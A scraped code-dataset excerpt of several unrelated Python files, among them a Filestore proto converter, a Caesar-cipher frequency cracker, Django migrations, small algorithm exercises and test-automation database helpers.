name=Primitive.from_proto(resource.name),\n capacity_gb=Primitive.from_proto(resource.capacity_gb),\n source_backup=Primitive.from_proto(resource.source_backup),\n nfs_export_options=InstanceFileSharesNfsExportOptionsArray.from_proto(\n resource.nfs_export_options\n ),\n )\n\n\nclass InstanceFileSharesArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceFileShares.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceFileShares.from_proto(i) for i in resources]\n\n\nclass InstanceFileSharesNfsExportOptions(object):\n def __init__(\n self,\n ip_ranges: list = None,\n access_mode: str = None,\n squash_mode: str = None,\n anon_uid: int = None,\n anon_gid: int = None,\n ):\n self.ip_ranges = ip_ranges\n self.access_mode = access_mode\n self.squash_mode = squash_mode\n self.anon_uid = anon_uid\n self.anon_gid = anon_gid\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptions()\n if Primitive.to_proto(resource.ip_ranges):\n res.ip_ranges.extend(Primitive.to_proto(resource.ip_ranges))\n if InstanceFileSharesNfsExportOptionsAccessModeEnum.to_proto(\n resource.access_mode\n ):\n res.access_mode = InstanceFileSharesNfsExportOptionsAccessModeEnum.to_proto(\n resource.access_mode\n )\n if InstanceFileSharesNfsExportOptionsSquashModeEnum.to_proto(\n resource.squash_mode\n ):\n res.squash_mode = InstanceFileSharesNfsExportOptionsSquashModeEnum.to_proto(\n resource.squash_mode\n )\n if Primitive.to_proto(resource.anon_uid):\n res.anon_uid = Primitive.to_proto(resource.anon_uid)\n if Primitive.to_proto(resource.anon_gid):\n res.anon_gid = Primitive.to_proto(resource.anon_gid)\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceFileSharesNfsExportOptions(\n ip_ranges=Primitive.from_proto(resource.ip_ranges),\n access_mode=InstanceFileSharesNfsExportOptionsAccessModeEnum.from_proto(\n resource.access_mode\n ),\n squash_mode=InstanceFileSharesNfsExportOptionsSquashModeEnum.from_proto(\n resource.squash_mode\n ),\n anon_uid=Primitive.from_proto(resource.anon_uid),\n anon_gid=Primitive.from_proto(resource.anon_gid),\n )\n\n\nclass InstanceFileSharesNfsExportOptionsArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceFileSharesNfsExportOptions.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceFileSharesNfsExportOptions.from_proto(i) for i in resources]\n\n\nclass InstanceNetworks(object):\n def __init__(\n self,\n network: str = None,\n modes: list = None,\n reserved_ip_range: str = None,\n ip_addresses: list = None,\n ):\n self.network = network\n self.modes = modes\n self.reserved_ip_range = reserved_ip_range\n self.ip_addresses = ip_addresses\n\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return None\n\n res = instance_pb2.FilestoreBetaInstanceNetworks()\n if Primitive.to_proto(resource.network):\n res.network = Primitive.to_proto(resource.network)\n if InstanceNetworksModesEnumArray.to_proto(resource.modes):\n res.modes.extend(InstanceNetworksModesEnumArray.to_proto(resource.modes))\n if Primitive.to_proto(resource.reserved_ip_range):\n res.reserved_ip_range = Primitive.to_proto(resource.reserved_ip_range)\n if Primitive.to_proto(resource.ip_addresses):\n res.ip_addresses.extend(Primitive.to_proto(resource.ip_addresses))\n return res\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return None\n\n return InstanceNetworks(\n network=Primitive.from_proto(resource.network),\n modes=InstanceNetworksModesEnumArray.from_proto(resource.modes),\n reserved_ip_range=Primitive.from_proto(resource.reserved_ip_range),\n ip_addresses=Primitive.from_proto(resource.ip_addresses),\n )\n\n\nclass InstanceNetworksArray(object):\n @classmethod\n def to_proto(self, resources):\n if not resources:\n return resources\n return [InstanceNetworks.to_proto(i) for i in resources]\n\n @classmethod\n def from_proto(self, resources):\n return [InstanceNetworks.from_proto(i) for i in resources]\n\n\nclass InstanceStateEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceStateEnum.Value(\n \"FilestoreBetaInstanceStateEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceStateEnum.Name(resource)[\n len(\"FilestoreBetaInstanceStateEnum\") :\n ]\n\n\nclass InstanceTierEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceTierEnum.Value(\n \"FilestoreBetaInstanceTierEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceTierEnum.Name(resource)[\n len(\"FilestoreBetaInstanceTierEnum\") :\n ]\n\n\nclass InstanceFileSharesNfsExportOptionsAccessModeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum.Value(\n \"FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum.Name(\n resource\n )[\n len(\"FilestoreBetaInstanceFileSharesNfsExportOptionsAccessModeEnum\") :\n ]\n\n\nclass InstanceFileSharesNfsExportOptionsSquashModeEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum.Value(\n \"FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum.Name(\n resource\n )[\n len(\"FilestoreBetaInstanceFileSharesNfsExportOptionsSquashModeEnum\") :\n ]\n\n\nclass InstanceNetworksModesEnum(object):\n @classmethod\n def to_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceNetworksModesEnum.Value(\n \"FilestoreBetaInstanceNetworksModesEnum%s\" % resource\n )\n\n @classmethod\n def from_proto(self, resource):\n if not resource:\n return resource\n return instance_pb2.FilestoreBetaInstanceNetworksModesEnum.Name(resource)[\n len(\"FilestoreBetaInstanceNetworksModesEnum\") :\n ]\n\n\nclass Primitive(object):\n @classmethod\n def to_proto(self, s):\n if not s:\n return \"\"\n return s\n\n @classmethod\n def from_proto(self, s):\n return s\n","sub_path":"python/services/filestore/beta/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":16269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"538558654","text":"# Use frequency analysis to find the key to ciphertext.txt, and then\n# decode it.\n\n# Your code here\ntext = open('ciphertext.txt','r')\nlines = text.read()\ndef cipher(s):\n \n cache = {}\n holder =[]\n cracker=['E', 'T', 'A', 'O', 'H', 'N', 'R', 'I', 'S', 'D', 'L', 'W', 'U',\n 'G', 'F', 'B', 'M', 'Y', 'C', 'P', 'K', 'V', 'Q', 'J', 'X', 'Z']\n crackList={}\n letter = ''\n def cipherCount(s):\n for i in s:\n if i.isalpha():\n if i not in cache:\n cache[i] = [i,1]\n cache[i][1] +=1\n return cache\n\n def getCipher():\n x = cache\n for i in x.values():\n holder.append(i)\n\n cipherCount(s)\n getCipher()\n holder.sort(key=lambda e:e[1], reverse=True)\n \n for i in range(len(holder)-1):\n x = holder[i][0]\n crackList[holder[i][0]] = cracker[i]\n \n\n # print(crackList)g\n for i in lines:\n if i in crackList:\n letter +=crackList[i]\n letter += i\n \n return letter\n\n\n# x = cipher(lines)\n\n# for i in range(2000):\n# t = cipher(x)\n# x = t \n\nprint(cipher(lines))","sub_path":"applications/crack_caesar/crack_caesar.py","file_name":"crack_caesar.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"203907052","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('bot', '0015_auto_20160515_2259'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conversas',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('date', models.DateTimeField(default=datetime.datetime(2016, 5, 15, 23, 4, 13, 546521, tzinfo=utc))),\n ('question', models.TextField()),\n ('answer', models.TextField()),\n ],\n ),\n migrations.AlterField(\n model_name='chat',\n name='date',\n field=models.DateTimeField(default=datetime.datetime(2016, 5, 15, 23, 4, 13, 545868, tzinfo=utc)),\n ),\n migrations.AddField(\n model_name='conversas',\n name='chat',\n field=models.ForeignKey(to='bot.Chat'),\n ),\n ]\n","sub_path":"bot/migrations/0016_auto_20160515_2304.py","file_name":"0016_auto_20160515_2304.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187706324","text":"import queue\n\ndef truckTour(petrolpumps):\n # init queue \n route = queue.Queue()\n\n # add all the pumps to the queue \n for p in petrolpumps:\n route.put(p) \n # var to hold the pump we end up starting at \n start = 0\n # var to keep track of the number of pumps we've traversed \n traversed = 0\n # amount of gas we have \n gas = 0\n\n # loop so long as we haven't traversed every single pump \n while traversed < len(petrolpumps):\n # get the next pump along the route \n pump = route.get() \n # add the amount of gas it has available \n gas += pump[0]\n # check if our gas tank has enough to get us \n # to the next pump \n if gas >= pump[1]:\n # increment traversed counter \n traversed += 1\n # decrement by the amount of gas it takes to get there \n gas -= pump[1] \n # if it doesn't, reset our gas tank, the number of pumps\n # we've traversed, and move on to consider the next pump\n else:\n # otherwise, starting at the pump we started at \n # isn't a viable option, so let's consider the \n # pump after the one we're currently on \n start += traversed + 1\n # reset traversed counter \n traversed = 0\n # reset gas counter \n gas = 0\n # add the pump to the back of the route \n route.put(pump)\n # at this point, we've found the starting pump that will\n # allow us to traverse all of the pumps; return it\n return start","sub_path":"truck_tour.py","file_name":"truck_tour.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557358245","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n replaces = [(b'goldenworm', '0001_initial'), (b'goldenworm', '0002_auto_20150808_0006'), (b'goldenworm', '0003_auto_20150810_2140'), (b'goldenworm', '0004_remove_stage_index'), (b'goldenworm', '0006_pathway'), (b'goldenworm', '0007_delete_pathway'), (b'goldenworm', '0008_gene_phenotype')]\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Gene',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('file', models.FileField(help_text=b'GenBank format', upload_to=b'')),\n ('start', models.PositiveIntegerField()),\n ('end', models.PositiveIntegerField()),\n ('strand', models.IntegerField(choices=[(1, b'Forward'), (-1, b'Reverse')])),\n ('name', models.CharField(max_length=100)),\n ('sequence_type', models.CharField(max_length=100, choices=[(b'G', b'Genomic locus'), (b'A', b'Pathway gene'), (b'S', b'Selection cassette')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Stage',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('degeneracy', models.CharField(max_length=100)),\n ('name', models.CharField(max_length=100)),\n ('annealable_seq', models.ForeignKey(related_name=b'annealable_seq', to='goldenworm.Gene')),\n ('selection_cassette', models.ForeignKey(related_name=b'selection_cassette', to='goldenworm.Gene')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RenameField(\n model_name='gene',\n old_name='sequence_type',\n new_name='type',\n ),\n migrations.CreateModel(\n name='InchwormAssembly',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('genome', models.ForeignKey(to='goldenworm.Gene')),\n ('stages', models.ManyToManyField(to=b'goldenworm.Stage')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='gene',\n name='phenotype',\n field=models.CharField(default='', max_length=100, blank=True),\n preserve_default=False,\n ),\n ]\n","sub_path":"goldenworm/migrations/0001_squashed_0008_gene_phenotype.py","file_name":"0001_squashed_0008_gene_phenotype.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382793537","text":"from random import randrange\r\n\r\n\r\nclass Node:\r\n def __init__(self, name, height):\r\n self.height = height\r\n self.name = name\r\n self.children = []\r\n self.size = 0\r\n\r\n def change_name(self, name):\r\n self.name = name\r\n\r\n def add_child(self, name):\r\n self.size += 1\r\n self.children.append(Node(name, self.height))\r\n\r\n def get_child(self, index):\r\n if index < self.size:\r\n return self.children[index]\r\n else:\r\n return False\r\n\r\n def print_children(self):\r\n for child in self.children:\r\n print(child.name, \"-\", child.size, end=\"|\")\r\n\r\n\r\ndef generate_tree(height):\r\n root = Node(1, height)\r\n temp = root\r\n depth = 2\r\n\r\n while temp.name != height:\r\n path = randrange(-1, temp.size)\r\n if path == -1:\r\n temp.add_child(depth)\r\n temp = root\r\n depth = 2\r\n else:\r\n temp = temp.get_child(path)\r\n depth += 1\r\n\r\n return root\r\n\r\n\r\ndef get_branch(tree, tab, n=0):\r\n if len(tab) == 0:\r\n return tree\r\n elif tree.get_child(tab[n]) is False:\r\n return False\r\n elif n < len(tab) - 1:\r\n return get_branch(tree.get_child(tab[n]), tab, n + 1)\r\n else:\r\n return tree.get_child(tab[n])\r\n\r\n\r\ndef print_tree(root):\r\n print(root.name, end=\"~\")\r\n root.print_children()\r\n print(\"\")\r\n\r\n tree_path = [0]\r\n\r\n while len(tree_path) < root.height:\r\n branch = get_branch(root, tree_path)\r\n if branch:\r\n tree_path[-1] += 1\r\n\r\n print(tree_path)\r\n\r\n for index_ in range(len(tree_path), 1, -1):\r\n while not get_branch(root, tree_path[0:index_]):\r\n tree_path[index_] += 1\r\n if tree_path[index_] > get_branch(root, tree_path[0:(index_ - 1)]):\r\n break\r\n\r\n\r\n\r\n\r\ntree_ = generate_tree(3)\r\n\r\nprint_tree(tree_)\r\n","sub_path":"Lista4/zad3.py","file_name":"zad3.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544833679","text":"#! /usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom library.myglobal import PATH,device_config\nfrom library.db import dbmysql\nfrom library.myglobal import logger\nfrom library import desktop\nimport time\nimport datetime\n\nautodb = dbmysql.MysqlDB(PATH('../config/dbconfig.ini'),'AUTOTEST')\nstagedb = dbmysql.MysqlDB(PATH('../config/dbconfig.ini'),'STAGE')\n\n\ndef filter_cases(suite_id, comp_list, pid):\n\n \"\"\"\n filter test cases according to test suite ID\n :param suite_id:\n :return: result list\n \"\"\"\n comp = []\n for cn in comp_list:\n query = 'select * from TestCaseManage_component where comp_name=\"{0}\" '.format(cn)\n result = autodb.select_one_record(query)\n temp = result[0]['comp_id']\n comp.append(str(temp))\n compstr = ','.join(comp)\n\n query = 'select * from TestCaseManage_testcase where teca_enable=1 and teca_comp_id in ({0}) ' \\\n 'and teca_prod_id in ({1}) and teca_id in (select tsca_teca_id from TestCaseManage_testsuitecase ' \\\n 'where tsca_tesu_id in ({2}))'.format(compstr, pid, suite_id)\n cases = autodb.select_many_record(query)\n if len(cases) == 0:\n logger.warning('There are not test cases')\n return cases\n\n\ndef filter_image_source(vendor):\n\n # get vendor ID\n query = 'select id from resource_vendor where vendor=\"{0}\"'.format(vendor)\n result = autodb.select_one_record(query)\n vid = str(result[0]['id'])\n\n query = 'select A.*, B.alias from resource_image A INNER JOIN resource_verification B ON A.id = B.img_id where B.vendor_id = {0} and B.enable = 1'.format(vid)\n cases = autodb.select_many_record(query)\n if len(cases) == 0:\n logger.warning('There are not test cases')\n return cases\n\n\ndef get_action_list(comp_id):\n\n \"\"\"\n get component is mapping with action\n :param comp_id:\n :return:\n \"\"\"\n\n action_list = []\n\n # query = 'select * from Component where comp_name like \"{0}\" '.format(comp_name)\n # result = autodb.select_one_record(query)\n # comp_id = result[0]['comp_id']\n\n query = 'select * from TestCaseManage_actiongroup where acgr_comp_id={0} order by acgr_index'.format(comp_id)\n result = autodb.select_many_record(query)\n\n for re in result:\n\n actid = re['acgr_acti_id']\n query = 'select * from TestCaseManage_action where acti_id={0}'.format(actid)\n result = autodb.select_one_record(query)\n action_list.append(result[0]['acti_name'])\n\n return action_list\n\n\ndef get_comp_name(comp_id):\n\n \"\"\"\n get component name according to id\n :param vp_id:\n :return:\n \"\"\"\n\n query = 'select * from TestCaseManage_component where comp_id={0} '.format(comp_id)\n result = autodb.select_one_record(query)\n comp_name = result[0]['comp_name']\n return comp_name\n\n\ndef get_vp_name(vp_id):\n\n \"\"\"\n get vp name according to id\n :param vp_id:\n :return:\n \"\"\"\n\n query = 'select * from TestCaseManage_vpname where vp_id={0} '.format(vp_id)\n result = autodb.select_one_record(query)\n vp_name = result[0]['vp_name']\n return vp_name\n\n\ndef get_vp_type(vpt_id):\n\n \"\"\"\n get vp type according to id\n :param vp_id:\n :return:\n \"\"\"\n\n query = 'select * from TestCaseManage_vptype where vpt_id={0} '.format(vpt_id)\n result = autodb.select_one_record(query)\n vpt_name = result[0]['vpt_name']\n return vpt_name\n\n\ndef get_prodcut_name_byID(pid):\n\n \"\"\"\n get product name according to pid\n :param pid:\n :return:\n \"\"\"\n\n query = 'select TestCaseManage_product from Product where prod_id={0}'.format(pid)\n result = autodb.select_one_record(query)\n pname = result[0]['prod_name']\n return pname\n\n\ndef get_product_ID_byName(pname):\n\n \"\"\"\n\n :param pname:\n :return:\n \"\"\"\n\n query = \"select prod_id from TestCaseManage_product where prod_name REGEXP '[[:<:]]{0}[[:>:]]'\".format(pname.lower())\n result = autodb.select_many_record(query)\n res = []\n for re in result:\n res.append(str(re['prod_id']))\n return res\n\n\ndef get_memory_info(uid,ts,version,qtype):\n\n if qtype.upper() == 'MAX':\n sql = \"select max(mi_rss) as value from TestCaseManage_meminfo \"\n elif qtype.upper() == 'AVG':\n sql = \"select avg(mi_rss) as value from TestCaseManage_meminfo \"\n else:\n sql = \"select max(mi_rss) as value from TestCaseManage_meminfo \"\n\n sql = sql + \"where mi_uid='{0}' and mi_ver='{1}' and mi_ts='{2}' \" \\\n \"group by mi_uid,mi_ver,mi_ts\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n value = result[0]['value']\n return int(value)\n\n\ndef get_cpu_info(uid,ts,version):\n\n sql = \"select avg(ci_cpu) as value from TestCaseManage_cpuinfo \" +\\\n \"where ci_uid='{0}' and ci_ver='{1}' and ci_ts='{2}' \" \\\n \"group by ci_uid,ci_ver,ci_ts\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n avg_val = result[0]['value']\n\n # get the max value\n sql = \"select max(ci_cpu) as value from TestCaseManage_cpuinfo \" +\\\n \"where ci_uid='{0}' and ci_ver='{1}' and ci_ts='{2}' \" \\\n \"group by ci_uid,ci_ver,ci_ts\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n max_val = result[0]['value']\n\n #get the last 6 cpu value\n sql = \"select sum(test.ci_cpu) as value from (select ci_cpu from TestCaseManage_cpuinfo \" +\\\n \"where ci_uid='{0}' and ci_ver='{1}' and ci_ts='{2}' \" \\\n \"order by ci_id DESC limit 6) as test\".format(uid,version,ts)\n\n result = autodb.select_one_record(sql)\n last_val = result[0]['value']\n\n return [avg_val, max_val, last_val]\n\n\n# just for memory and cpu information\ndef insert_info_to_db(filename,ts,uid,version,dtype):\n\n \"\"\"\n\n :param filename:\n :param ts:\n :param uid:\n :return:\n \"\"\"\n with open(filename) as rfile:\n if dtype.upper() == 'MEMORY':\n row = 0\n for ln in rfile:\n if row % 2 == 1:\n row +=1\n continue\n #ln = ' '.join(filter(lambda x: x, ln.split(' ')))\n value = ln.split(':')\n if len(value) > 0:\n temp = value[0].replace('K','')\n pss = temp.replace(',','').strip()\n query = \"insert into TestCaseManage_meminfo(mi_uid,mi_ts,mi_ver,mi_uss,mi_pss) values('{0}','{1}','{2}',{3},{4})\".\\\n format(uid, ts, version, int(0), int(pss))\n result = autodb.execute_insert(query)\n if not result:\n return False\n row +=1\n elif dtype.upper() == 'CPU':\n for ln in rfile:\n ln = ' '.join(filter(lambda x: x, ln.split(' ')))\n value = ln.split(' ')\n if len(value) > 4:\n cpu = value[4].replace('%','')\n cpu = float(cpu)/100\n query = \"insert into TestCaseManage_cpuinfo(ci_uid,ci_ts,ci_ver,ci_cpu) values('{0}','{1}','{2}',{3})\".\\\n format(uid, ts, version, cpu)\n result = autodb.execute_insert(query)\n if not result:\n return False\n\n return True\n\n\ndef insert_runinfo(slist,dname, vname, loop,ltype):\n\n cur_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n if ltype.upper() == 'ALL':\n lt = 0\n else:\n lt = 1\n\n query = \"insert into TestCaseManage_runinfo(run_tesu_id,run_device_name,run_build_name,run_date,run_loop_number, run_loop_type, run_name) \" \\\n \"values('{0}','{1}','{2}','{3}',{4},{5}, '{6}')\".format(slist, dname, vname, cur_date, loop, lt, 'qatest')\n autodb.execute_insert(query)\n\n # get new id value\n query = \"select MAX(run_id) from TestCaseManage_runinfo\"\n result = autodb.select_one_record(query)\n id = str(result[0]['MAX(run_id)'])\n\n # update run name\n query = \"\"\n return id\n\n\ndef insert_test_result(run_id, teca_id, lp_num, teca_result, log):\n\n # get suite id\n query = \"select run_tesu_id from TestCaseManage_runinfo where run_id={0}\".format(run_id)\n result = autodb.select_one_record(query)\n sid = result[0]['run_tesu_id'].encode('utf8').split(',')\n\n # get case mapping suite_id\n query = \"select distinct tsca_tesu_id from TestCaseManage_testsuitecase where tsca_teca_id = {0}\".format(teca_id)\n result = autodb.select_many_record(query)\n sid2 = []\n for re in result:\n sid2.append(str(re['tsca_tesu_id']))\n # get insection set\n final_sid = ','.join(list(set(sid) & set(sid2)))\n\n # insert result to db\n cur_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n log = log.replace('\\\\', '/')\n query = \"insert into TestCaseManage_testresult(resu_run_id,resu_tesu_id,resu_teca_id,resu_loop,resu_date_time, resu_result, resu_log_info) \" \\\n \"values({0},'{1}',{2},{3},'{4}','{5}','{6}')\".format(run_id, final_sid, teca_id, lp_num, cur_date, teca_result, log)\n autodb.execute_insert(query)\n\n\n# update stage db for module update\ndef update_stage_module_network(mid, exp_network, exp_killself):\n\n updateFlag = False\n query = 'select * from fun_plugin_file where id = {0}'.format(mid)\n result = stagedb.select_one_record(query)\n network = result[0]['network']\n killself = result[0]['killself']\n query = ''\n if exp_network != network or exp_killself != killself:\n query = 'update fun_plugin_file set network = {0},killself={1} where id = {2}'.format(exp_network, exp_killself, mid)\n if query != '':\n stagedb.execute_update(query)\n updateFlag = True\n\n return updateFlag\n\n\n# update stage db for module enalbe/disable\ndef update_stage_module_status(mid, flag):\n\n if flag:\n query = 'update fun_plugin_file set enable = {0} where id = {1}'.format(1, mid)\n else:\n query = 'update fun_plugin_file set enable = {0} where id = {1}'.format(0, mid)\n\n stagedb.execute_update(query)\n\n\ndef get_module_info(id):\n\n query = 'select encryption_client_path, encryption_length, encryption_path, encryption_hash from fun_plugin_file where id = {0}'.format(id)\n result = stagedb.select_one_record(query)\n res = {}\n res['path'] = result[0]['encryption_client_path'].encode('utf8')\n res['length'] = str(result[0]['encryption_length'])\n res['url'] = result[0]['encryption_path'].encode('utf8')\n res['hash'] = result[0]['encryption_hash'].encode('utf8')\n res['soft_version'] = result[0]['soft_version']\n return res\n\n\ndef check_amount_limit(mid):\n\n flag = False\n cur_date = datetime.datetime.now().strftime(\"%Y-%m-%d\")\n cur_date = \" \".join([cur_date, \"00:00:00\"])\n start_time = desktop.get_time_stamp(cur_date, 0)\n end_time = desktop.get_time_stamp(cur_date, 1)\n\n query = \"select * from fun_plugin_amount_limit where plugin_file_id= {0} and start_time= {1}\".format(mid, start_time)\n result = stagedb.select_one_record(query)\n if result[0] is None:\n query = \"insert into fun_plugin_amount_limit(plugin_file_id, enable, start_time, end_time, max_get_amount) values({0},1,{1},{2},1000)\".format(mid, start_time,end_time)\n stagedb.execute_insert(query)\n flag = True\n\n return flag\n\n\ndef get_operation_module_info(key, id):\n\n if key.lower() == 'module':\n query = 'select path, length, hash, encryption_path, soft_version from fun_plugin_file where id = {0}'.format(id)\n else:\n query = 'select path, length, hash, client_path,version from fun_upgrade_operation where id = {0}'.format(id)\n result = stagedb.select_one_record(query)\n res = {}\n res['path'] = result[0]['path'].encode('utf8')\n res['length'] = str(result[0]['length'])\n res['hash'] = result[0]['hash'].encode('utf8')\n if key.lower() != 'module':\n res['cpath'] = result[0]['client_path'].encode('utf8')\n res['version'] = result[0]['version']\n else:\n res['cpath'] = result[0]['encryption_path'].encode('utf8')\n res['version'] = result[0]['soft_version']\n return res\n\n\ndef get_all_module_info(conf_dict):\n\n result = {}\n\n for key, value in conf_dict.items():\n if key.lower() == 'c_rule':\n continue\n else:\n result[key] = get_operation_module_info(key, value)\n return result\n\n\ndef update_push_interval(ruleID, value):\n\n interval = int(value)*60*1000\n\n query = \"update fun_wallpaper_limit set sequence={0} where id=-1 and rule_id = {1} and type = '{2}'\".format(str(interval), ruleID, 'push')\n stagedb.execute_update(query)\n\n\ndef update_switch(ruleID, stype, action):\n\n key = ''.join([stype, ':', action.upper()])\n\n # current this id is not changed, so here is hard code\n switcher = {\n 'dev_statistic:OFF': 75,\n 'dev_statistic:ON': 66,\n 'init_operation_module:OFF': 91,\n 'init_operation_module:ON': 89\n }\n id = switcher.get(key, 0)\n\n if id != 0:\n query = \"select * from fun_wallpaper_limit where id={0} and rule_id = {1} and type = '{2}'\".format(id, ruleID, 'switch')\n result = stagedb.select_one_record(query)\n if result[0] is None:\n query = \"insert into fun_wallpaper_limit(id, rule_id, type, enabled, sequence, priority) values({0},{1},'{2}',1,0,0)\".format(id,ruleID, 'switch')\n stagedb.execute_insert(query)\n else:\n query = \"update fun_wallpaper_limit set enabled=1 where id={0} and rule_id = {1} and type = '{2}'\".format(id, ruleID, 'switch')\n stagedb.execute_update(query)\n if id == 75 or id == 66:\n diff_id = list(set([75,66]) - set([id]))\n if id == 91 or id == 89:\n diff_id = list(set([91,89]) - set([id]))\n\n query = \"update fun_wallpaper_limit set enabled=0 where id={0} and rule_id = {1} and type = '{2}'\".format(diff_id[0], ruleID, 'switch')\n stagedb.execute_update(query)\n\n # update switch\n update_switch_time()\n\n\ndef start_c_process(ruleID, action):\n\n updateFlag = False\n query = \"select * from fun_wallpaper_limit where id={0} and rule_id = {1} and type = '{2}'\".format(7, ruleID, 'upgrade_c_setup')\n result = stagedb.select_one_record(query)\n value = result[0]['enabled']\n\n query = ''\n if action != value:\n query = \"update fun_wallpaper_limit set enabled={0} where id={1} and rule_id = {2} and type = '{3}'\".format(action, 7, ruleID, 'upgrade_c_setup')\n\n if query != '':\n stagedb.execute_update(query)\n updateFlag = True\n\n return updateFlag\n\n\n# update stage db for operation module\n# value format: wifi:killself\ndef update_operation_module(mid, exp_network, exp_killself, exp_enabled):\n\n updateFlag = False\n query = 'select * from fun_upgrade_operation where id = {0}'.format(mid)\n result = stagedb.select_one_record(query)\n network = result[0]['network_type']\n killself = result[0]['killself']\n enabled = result[0]['enable']\n query = ''\n if exp_network != network or exp_killself != killself or exp_enabled != enabled:\n query = 'update fun_upgrade_operation set network_type = {0},killself={1}, enable={2} where id = {3}'.format(exp_network, exp_killself, exp_enabled, mid)\n\n if query != '':\n stagedb.execute_update(query)\n updateFlag = True\n\n return updateFlag\n\n\ndef update_switch_time():\n\n t = time.time()\n timestamp = (int(round(t * 1000)))\n query = 'update fun_push_public set time={0} where type={1}'.format(timestamp, 'switch')\n result = stagedb.execute_update(query)\n\n\nif __name__ == '__main__':\n\n #insert_info_to_db(r'E:\\AutoTestFrame\\log\\20170817\\ZX1G22TG4F_\\1801TestMemory\\test_memory_cpu_1_0_1','201708081629','ZX1G22TG4F','2.01','memory')\n #value = get_memory_info('ZX1G22TG4F', '201708081629', '1.01', 'avg')\n #update_switch('3423', 'dev_statistic', 'off')\n #insert_test_result(7, 1, 3, 'pass', '/test/log.txt')\n\n import csv\n\n with open(r'E:\\work\\vivo.csv') as rfile:\n reader = csv.reader(rfile)\n for line in reader:\n #name = unicode(line[0],'gbk')\n #query = 'insert resource_image(name,fid,xml_id) values(\"{0}\",{1},{2})'.format(name, line[1], line[2])\n query = 'insert resource_verification(vendor_id, img_id, enable) values({0},{1},{2})'.format(line[3],line[4],line[5])\n autodb.execute_insert(query)\n pass\n","sub_path":"business/querydb.py","file_name":"querydb.py","file_ext":"py","file_size_in_byte":16340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"610224240","text":"class Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n\n def _dfs(nums, subset, output):\n if not nums:\n if subset not in output:\n output.append(subset)\n return\n\n for i in range(len(nums)):\n # Handle's duplicates. Similar to 3sum\n if i > 0 and nums[i] == nums[i - 1]:\n continue\n cur = nums[i]\n _dfs(nums[:i] + nums[i + 1:], subset + [cur], output)\n\n output = 